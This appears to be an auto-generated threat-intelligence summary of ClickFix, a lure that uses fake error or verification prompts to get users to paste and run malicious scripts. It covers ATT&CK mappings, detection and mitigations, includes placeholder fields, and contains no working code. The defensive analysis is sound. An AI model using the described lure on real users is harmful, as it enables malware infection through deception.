Full Report
The ClickFix social engineering technique has become the second most common attack vector, behind only phishing, according to ESET research
Analysis Summary
# Tool/Technique: ClickFix
## Overview
ClickFix is a social engineering technique that manipulates victims into copying and pasting a malicious script and subsequently executing it on their system. It exploits the user's inclination to self-resolve perceived errors or verification issues, bypassing traditional security alerts. It has become the second most common attack vector reported in H1 2025, surging 517% in popularity.
## Technical Details
- Type: Technique/Social Engineering
- Platform: Windows, Linux, macOS (All major operating systems)
- Capabilities: Infection via user self-execution; delivery mechanism for various malware types.
- First Seen: First observed by Proofpoint in March 2024.
## MITRE ATT&CK Mapping
*Note: As ClickFix is a delivery mechanism relying on user interaction to execute attacker-supplied code, the following mappings reflect the execution phase and initial access intent.*
- TA0005 - Defense Evasion
- T1204 - User Execution
- T1204.002 - Malicious File
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.002 - Spearphishing Link (If link leads to the instruction page/script)
## Functionality
### Core Capabilities
- Social engineering via fake error or verification messages.
- Tricking users into copying and pasting a malicious script.
- Relying on the victim to execute the pasted script, leading to self-infection and bypassing some perimeter defenses.
### Advanced Features
- Use of weaponized "builders" that others can purchase to rapidly create ClickFix landing pages.
- Versatility in delivering a wide array of subsequent malware payloads.
## Indicators of Compromise
- File Hashes: [No specific hashes provided in the context]
- File Names: [No specific file names provided in the context]
- Registry Keys: [Not specified]
- Network Indicators: [No specific C2/network indicators provided in the context]
- Behavioral Indicators: Execution of pasted scripts (e.g., PowerShell commands) initiated by direct user action following a deceptive prompt.
## Associated Threat Actors
- Unspecified threat actors, though the proliferation of builders suggests wider adoption across the cybercrime ecosystem.
## Detection Methods
- Signature-based detection: [To be developed based on specific script hashes/payloads being delivered]
- Behavioral detection: Detection of unusual execution patterns, especially commands being pasted directly into command-line interfaces or terminals by users outside of standard administrative routines.
- YARA rules: [Not available in context]
## Mitigation Strategies
- Prevention measures: User training emphasizing caution regarding prompts asking to copy/paste and run code, even if presented as 'fixes'.
- Hardening recommendations: Implementing application control policies to restrict execution of scripts from non-standard sources or user contexts; restricting PowerShell execution policies where possible; enabling advanced endpoint detection and response (EDR) monitoring for suspicious process parenting or execution from atypical sources (e.g., clipboard interactions leading to execution).
## Related Tools/Techniques
- Phishing (as the primary vector it is secondary to)
- Clipboard compromise techniques (as the mechanism relies on clipboard interaction)
- Droppers/Loaders (the scripts delivered via ClickFix often function as droppers)